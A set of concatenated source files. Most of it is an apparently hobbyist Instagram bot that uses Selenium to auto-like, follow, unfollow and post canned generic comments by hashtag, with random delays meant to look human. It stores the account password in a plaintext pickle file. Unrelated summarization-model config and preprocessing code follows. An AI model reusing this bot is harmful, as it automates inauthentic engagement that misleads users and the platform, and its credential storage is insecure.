with open("log/actionList.pickle","wb") as f:
self.actionList = {}
pickle.dump({},f)
try:
with open("log/followed_users_all_time.pickle","rb") as f:
self.followed_accounts = pickle.load(f)
except:
with open("log/followed_users_all_time.pickle","wb") as f:
self.followed_accounts = {}
pickle.dump({},f)
try:
with open("log/followed_users.pickle","rb") as f:
self.accounts_to_unfollow = pickle.load(f)
except:
with open("log/followed_users.pickle","wb") as f:
self.accounts_to_unfollow = []
pickle.dump([],f)
try:
with open("log/instagram_username.pickle","rb") as f:
self.username = pickle.load(f)
except:
key = input("Please enter your username: ")
while len(key) == 0:
key = input("You must enter a username. Please try again: ")
with open("log/instagram_username.pickle","wb") as f:
pickle.dump(key,f)
self.username = key
try:
with open("log/instagram_pass.pickle","rb") as f:
self.password = pickle.load(f)
except:
key = input("Please enter your password: ")
while len(key) == 0:
key = input("You must enter a password. Please try again: ")
with open("log/instagram_pass.pickle","wb") as f:
pickle.dump(key,f)
self.password = key
# Final setup
if Config.headless_is_available:
# self.browser = webdriver.PhantomJS(desired_capabilities=dcap)
self.browser = webdriver.PhantomJS()
else:
self.browser = webdriver.Chrome("./chromedriver")
self.browser.set_window_size(1980,1080)
# Returns nicely formatted timestamp
def timestamp(self):
return time.strftime('%a %H:%M:%S')+" "
def focus(self,element):
self.browser.execute_script("arguments[0].focus();", element)
# Checks if a user was followed already
def user_followed_already(self, user):
if user in self.followed_accounts:
return True
else:
return False
# Logs into Instagram automatically
def login(self):
self.mailer.send("Logging in.")
print("Logging in.")
self.browser.get(Config.start_url)
sleep(5)
if (self.browser.current_url == "https://www.instagram.com/"):
return
if (self.mailer.get_current_message() == "Pause"):
self.mailer.send("Bot paused.")
raise Exception("Bot paused.")
if (self.mailer.get_current_message() == "Stop"):
self.mailer.send("Bot stopped.")
raise Exception("Bot stopped.")
try:
username_field = self.browser.find_element_by_name("username")
username_field.send_keys(self.username)
password_field = self.browser.find_element_by_name("password")
password_field.send_keys(<PASSWORD>)
password_field.send_keys(Keys.RETURN)
sleep(10)
return
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.login')
sleep(1)
self.login()
return
# Comments on a picture
def comment(self, topic):
sleep(3)
query = Config.comments[randint(0,len(Config.comments)-1)]
say = query.format(self.author(),Config.smileys[randint(0,len(Config.smileys)-1)])
try:
comment_field = self.browser.find_element_by_xpath(Config.comment_xpath)
comment_field.send_keys(say)
comment_field.send_keys(Keys.RETURN)
self.mailer.send("Commented on "+str(self.author())+"s picture with: "+say+"\n")
print("Commented on "+str(self.author())+"s picture with: "+say)
if self.author() not in self.actionList.keys():
value = {"type":"comment","time":self.timestamp(),"topic":topic}
self.actionList[self.author()] = [value]
else:
value = {"type":"comment","time":self.timestamp(),"topic":topic}
authorActions = self.actionList[self.author()]
authorActions.append(value)
self.actionList[self.author()] = authorActions
with open("log/actionList.pickle", "wb") as userfile:
pickle.dump(self.actionList, userfile)
sleep(1)
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.comment')
self.mailer.send("Comment field not found.\n")
print("Comment field not found.")
# Searches for a certain topic
def search(self, query):
self.mailer.send("Searching for "+query+".")
print("Searching for "+query+".")
self.browser.get("https://www.instagram.com/explore/tags/"+query+"/")
# Checks for error which occurs when pictures are removed while
# switching through
def error(self):
try:
error_message = self.browser.find_element_by_xpath(Config.error_xpath)
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Page loading error')
print("Page loading error.")
return True
except KeyboardInterrupt:
return
except:
return False
# Selects the first picture in a loaded topic screen
def select_first(self):
try:
pictures = self.browser.find_elements_by_xpath(Config.first_ele_xpath)
print("Found "+str(len(pictures))+" pictures.")
first_picture = None
if len(pictures) > 9:
first_picture = pictures[9]
else:
first_picture = pictures[len(pictures)-1]
self.focus(first_picture)
first_picture.click()
sleep(1)
return True
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.select_first')
sleep(5)
return False
# Switches to the next picture
def next_picture(self):
try:
sleep(1)
next_button = self.browser.find_element_by_xpath(Config.next_button_xpath)
next_button.click()
return
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.next_picture')
self.browser.execute_script("window.history.go(-1)")
sleep(5)
self.select_first()
sleep(1)
# Loads the authors name
def author(self):
try:
author = self.browser.find_element_by_xpath(Config.author_xpath)
return str(author.get_attribute("title"))
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.author')
self.mailer.send("Author xpath not found.\n")
print("Author xpath not found.")
return ""
# Checks if the post is already liked
def already_liked(self):
try:
full = self.browser.find_element_by_xpath(Config.like_button_full_xpath)
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Image was already liked.')
return True
except:
return False
def on_post_page(self):
try:
full = self.browser.find_element_by_xpath(Config.next_button_xpath)
return False
except:
return True
# Likes a picture
def like(self, topic):
count = 0
while self.already_liked() and count < 10:
self.mailer.send("Post already liked. Skipping.\n")
print("Post already liked. Skipping.")
self.next_picture()
if self.on_post_page():
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Accidently swapped to post page.')
return
count = count + 1
sleep(1)
try:
self.mailer.send("Liked picture/video by: "+self.author()+".\n")
print("Liked picture/video by: "+self.author()+".")
if self.author() not in self.actionList.keys():
value = {"type":"like","time":self.timestamp(),"topic":topic}
self.actionList[self.author()] = [value]
else:
value = {"type":"like","time":self.timestamp(),"topic":topic}
authorActions = self.actionList[self.author()]
authorActions.append(value)
self.actionList[self.author()] = authorActions
with open("log/actionList.pickle", "wb") as userfile:
pickle.dump(self.actionList, userfile)
like_button = self.browser.find_element_by_xpath(Config.like_button_xpath)
like_button.click()
sneaksleep = randint(0,10) + Config.delay
sleep(sneaksleep)
return
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.like')
sleep(Config.delay)
self.search(topic)
self.select_first()
self.like(topic)
return
# Unfollows a user
def unfollow(self, name):
self.browser.get("https://www.instagram.com/"+name+"/")
sleep(3)
try:
unfollow_button = self.browser.find_element_by_xpath(Config.unfollow_xpath)
unfollow_button.click()
self.mailer.send("Unfollowed: "+name+".\n")
print("Unfollowed: "+name)
sleep(2)
except KeyboardInterrupt:
return
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.unfollow')
self.mailer.send("Unfollow button not found.\n")
print("Unfollow button not found.")
sleep(1)
# Follows a user
def follow(self, topic):
sleep(3)
try:
follow = self.browser.find_element_by_xpath(Config.follow_xpath)
follow.click()
self.mailer.send("Followed: "+self.author()+"\n")
print("Followed: "+self.author())
with open("log/followed_users.pickle", "wb") as userfile:
pickle.dump(self.accounts_to_unfollow, userfile)
if self.author() not in self.actionList.keys():
value = {"type":"follow","time":self.timestamp(),"topic":topic}
self.actionList[self.author()] = [value]
else:
value = {"type":"follow","time":self.timestamp(),"topic":topic}
authorActions = self.actionList[self.author()]
authorActions.append(value)
self.actionList[self.author()] = authorActions
with open("log/actionList.pickle", "wb") as userfile:
pickle.dump(self.actionList, userfile)
self.accounts_to_unfollow.append(self.author())
self.followed_accounts.update({self.author():self.timestamp()})
with open("log/followed_users_all_time.pickle", "wb") as userfile:
pickle.dump(self.followed_accounts, userfile)
sleep(Config.delay + randint(0,10))
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.follow')
self.mailer.send("Follow button not found.\n")
print("Follow button not found.")
sleep(1)
def open_unfollow_screen(self):
self.browser.get(Config.account_url)
sleep(2)
heart = self.browser.find_element_by_xpath(Config.following_xpath)
heart.click()
sleep(2)
def check_follows(self):
try:
sections = self.browser.find_elements_by_xpath(Config.sections_xpath)
print(str(len(sections))+" Sections found.")
except:
print("Sections not found.")
return
users = []
for element in sections:
profile = element.find_element_by_xpath(Config.local_name_xpath)
name = profile.get_attribute("title")
users.append(name)
for user in users:
if user not in self.interacting_users:
if user not in self.actionList.keys():
self.mailer.send("New interaction discovered with: "+user+", but we have no further information.")
sleep(1)
else:
actions = self.actionList[user]
self.mailer.send("New interaction discovered with: "+user+", and we have logged our interactions on him:")
sleep(1)
string = ""
for action in actions:
string += "Type: "+action["type"]+", Time: "+action["time"]+", Topic: "+action["topic"]+" ... "
self.hashtags[action["topic"]] += 1
self.mailer.send(string)
sleep(1)
self.interacting_users.append(user)
with open("log/interacting_users.pickle", "wb") as userfile:
pickle.dump(self.interacting_users, userfile)
return
def store_hashtags(self):
try:
sections = self.browser.find_elements_by_xpath(Config.hashtags_xpath)
for section in sections:
all_hashtags = self.extract_hash_tags(section.text)
for h in all_hashtags:
if h in self.hashtags:
self.hashtags[h] = self.hashtags[h] + 0.01
else:
self.hashtags[h] = 0.01
with open("log/hashtags.pickle","wb") as f:
pickle.dump(self.hashtags,f)
except:
self.browser.save_screenshot('error.png')
self.mailer.send_image('error.png','Exception in self.store_hashtags')
pass
def extract_hash_tags(self, s):
return set(part[1:] for part in s.split() if part.startswith('#'))
# Coordinates every function in an endless loop
def like_follow_loop(self):
self.login()
while True:
self.open_unfollow_screen()
self.check_follows()
top_hashtags = sorted(self.hashtags.keys(), key=lambda k: self.hashtags[k], reverse=True)[:20]
top_hashtags_values = []
for hashtag in top_hashtags:
top_hashtags_values.append(self.hashtags[hashtag])
self.mailer.send_stats(top_hashtags_values,top_hashtags,caption="Top 20 hashtags")
low_hashtags = sorted(self.hashtags.keys(), key=lambda k: self.hashtags[k], reverse=True)[-20:]
low_hashtags_values = []
for hashtag in low_hashtags:
low_hashtags_values.append(self.hashtags[hashtag])
self.mailer.send_stats(low_hashtags_values,low_hashtags,caption="Low 20 hashtags")
sleep(1)
for topic_selector in range(len(top_hashtags)-1):
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
self.search(top_hashtags[topic_selector])
print("Selecting first picture.")
self.select_first()
if (topic_selector % 7 == 2):
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
if not self.error():
self.comment(top_hashtags[topic_selector])
self.store_hashtags()
self.next_picture()
for likes in range(3):
sleep(1)
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
if not self.error():
self.like(top_hashtags[topic_selector])
self.store_hashtags()
self.next_picture()
for follows in range(3):
sleep(1)
if not self.error():
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
self.next_picture()
count = 0
sleep(3)
while self.user_followed_already(self.author()) and count < 10:
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
self.mailer.send(self.author()+" was followed already. Skipping picture.")
print(self.author()+" was followed already. Skipping picture.")
self.next_picture()
count = count + 1
sleep(1)
self.follow(top_hashtags[topic_selector])
self.store_hashtags()
self.mailer.send("Accounts to unfollow: " + str(len(self.accounts_to_unfollow)))
print("Accounts to unfollow: " + str(len(self.accounts_to_unfollow)))
if len(self.accounts_to_unfollow) > 50:
for unfollows in range(3):
if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
raise Exception('Breaking out of inner loop')
this_guy = self.accounts_to_unfollow[0]
self.unfollow(this_guy)
del self.accounts_to_unfollow[0]
|
PhilippMatthes/instabot | Config.py | class Config:
topics = [ "graphics",
"render",
"cartoon",
"daily",
"art",
"design",
"cinema4d",
"animation",
"cg",
"illustration",
"3d",
"corona",
"octane",
"rendering",
"sculpting"]
delay = 35
start_url = "https://www.instagram.com/accounts/login/"
following_link = "https://www.instagram.com/snrmtths/following/"
account_url = "https://www.instagram.com/snrmtths/"
headless_is_available = True
# The following (xpath) classes need to be refreshed every now and then.
# they define, where elements are located on Instagram.
sections_xpath = "//*[contains(@class, '_75ljm _3qhgf')]"
local_name_xpath = ".//a[@class='_2g7d5 notranslate _nodr2']"
local_follow_xpath = "//a[@class='_ov9ai']"
hashtags_xpath = "//*[contains(@class, '_ezgzd')]"
# local_button_xpath = ".//*[@class='_ah57t _6y2ah _i46jh _rmr7s']"
first_ele_xpath = "//*[contains(@class, '_si7dy')]"
following_xpath = "//*[contains(@class, '_ohbcb _gvoze coreSpriteDesktopNavActivity')]"
follow_xpath = "//*[contains(@class, '_qv64e _iokts _4tgw8 _njrw0')]"
unfollow_xpath = "//*[contains(@class, '_qv64e _t78yp _r9b8f _njrw0')]"
comment_xpath = "//*[contains(@class, '_bilrf')]"
error_xpath = "//*[contains(@class, 'error-container -cx-PRIVATE-ErrorPage__errorContainer')]"
author_xpath = "//*[contains(@class, '_2g7d5 notranslate _iadoq')]"
next_button_xpath = "//*[contains(@class, '_3a693 coreSpriteRightPaginationArrow')]"
like_button_xpath = "//*[contains(@class, '_8scx2 coreSpriteHeartOpen')]"
like_button_full_xpath = "//*[contains(@class, '_8scx2 coreSpriteHeartFull')]"
# Available comments: the first {} is replaced with the username
# the second is replaced with a smiley. Note that UTF-8 smileys are only
# supported by Firefox driver which may corrupt some timed functionalities.
comments = [ "Nice @{} {}","@{} cool {} ","Great style @{} {}","Amazing @{} {}",\
"Awesome @{} {}","Fantastic @{} {}","@{} {}","Brilliant one @{} {}",\
"Pretty nice @{} {}","Awesome feed @{} {}","I like your feed @{} {}",\
"Top @{} {}", "Really cool works @{}! {}", "@{} Rad!!! {}",\
"This is cool @{} {}", "Love this @{} {}", "Great @{}! {}", "Yeah @{} {}"]
smileys = [ ":)",":D","=D","=)",";)",":)",":)",";D" ]
|
PhilippMatthes/instabot | Main.py | from InstaDriver import Driver
from Mailer import Mailer
from time import sleep
import traceback
import sys
import os
import errno
from socket import error as socket_error
def loop():
session = Driver()
mailer = Mailer()
while True:
message = mailer.get_current_message()
if (message == "Start" or message == "Continue"):
try:
session.like_follow_loop()
except KeyboardInterrupt:
mailer.send("Keyboard Interrupt. Bot will exit now.")
print("Exiting...")
break
except socket_error as err:
raise err
except Exception as err:
for frame in traceback.extract_tb(sys.exc_info()[2]):
fname, lineno, fn, text = frame
error = "Error in "+str(fname)+" on line "+str(lineno)+": "+str(err)
print(error)
mailer.send(error)
pass
else:
if (message == "Stop" or message == "Exit"):
mailer.send("Instagram Bot will exit now.")
raise Exception
sleep(1)
def run():
session = Driver()
mailer = Mailer()
while True:
try:
mailer.send("Instagram Bot started. Please send >>Start<< to start")
loop()
except socket_error as err:
if err.errno != errno.ECONNREFUSED:
raise err
else:
session = Driver()
mailer = Mailer()
if __name__=="__main__":
os.makedirs("./log", exist_ok=True)
run()
|
rezakrimi/MaxoutTextSummarization | cnn-dailymail/process.py | import os
import nltk
from tqdm import tqdm
import json
from collections import defaultdict
import pickle
def word_tokenize(tokens):
return [token.replace("''", '"').replace("``", '"') for token in nltk.word_tokenize(tokens)]
directory = './dailymail/stories/'
examples = list()
counter = defaultdict(int)
for filename in tqdm(os.listdir(directory)):
if filename.endswith('.story'):
file = open(os.path.join(directory, filename), 'r')
is_highlight = False
content_finished = False
content = ''
highlights = []
for line in file:
line = line.strip()
if not content_finished and line:
content = content + ' ' + line
if is_highlight and line:
highlights.append(line)
is_highlight = False
if line.startswith('@highlight'):
is_highlight = True
content_finished = True
content = word_tokenize(content[1:].replace("''", '" ').replace("``", '" ').lower())
highlight = ''
for i, h in enumerate(highlights):
if highlight != '':
highlight += '\n'
if i < len(highlights)-1:
highlight += h + '##'
if i == len(highlights)-1:
highlight += h + '.'
example = {
'context_tokens': content,
'ques_tokens': word_tokenize(highlight.replace("''", '" ').replace("``", '" ').lower())
}
for token in content:
counter[token] += len(highlights)
for token in highlight:
counter[token] += 1
examples.append(example)
# with open('data.json', 'w', encoding='utf-8') as f:
# json.dump(example, f, ensure_ascii=False, indent=4)
# file.close()
with open('dm_examples.pkl', 'wb') as f:
pickle.dump(examples, f)
with open('dm_counter.pkl', 'wb') as f:
pickle.dump(counter, f)
|
rezakrimi/MaxoutTextSummarization | config.py | <gh_stars>0
# train file
train_src_file = "./squad/para-train.txt"
train_trg_file = "./squad/tgt-train.txt"
# dev file
dev_src_file = "./squad/para-dev.txt"
dev_trg_file = "./squad/tgt-dev.txt"
# test file
test_src_file = "./squad/para-test.txt"
test_trg_file = "./squad/tgt-test.txt"
# embedding and dictionary file
embedding = "./data/embedding.pkl"
word2idx_file = "./data/word2idx.pkl"
model_path = "./save/model.pt"
device = "cuda:1"
use_gpu = True
debug = False
vocab_size = 45000
freeze_embedding = True
num_epochs = 20
max_len = 400
num_layers = 2
hidden_size = 300
embedding_size = 300
lr = 0.1
batch_size = 6
dropout = 0.3
max_grad_norm = 5.0
use_pointer = True
beam_size = 10
min_decode_step = 8
max_decode_step = 100
output_dir = "./result/pointer_maxout_ans"
|
rezakrimi/MaxoutTextSummarization | qgevalcap/__init__.py | __author__ = 'xinya'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.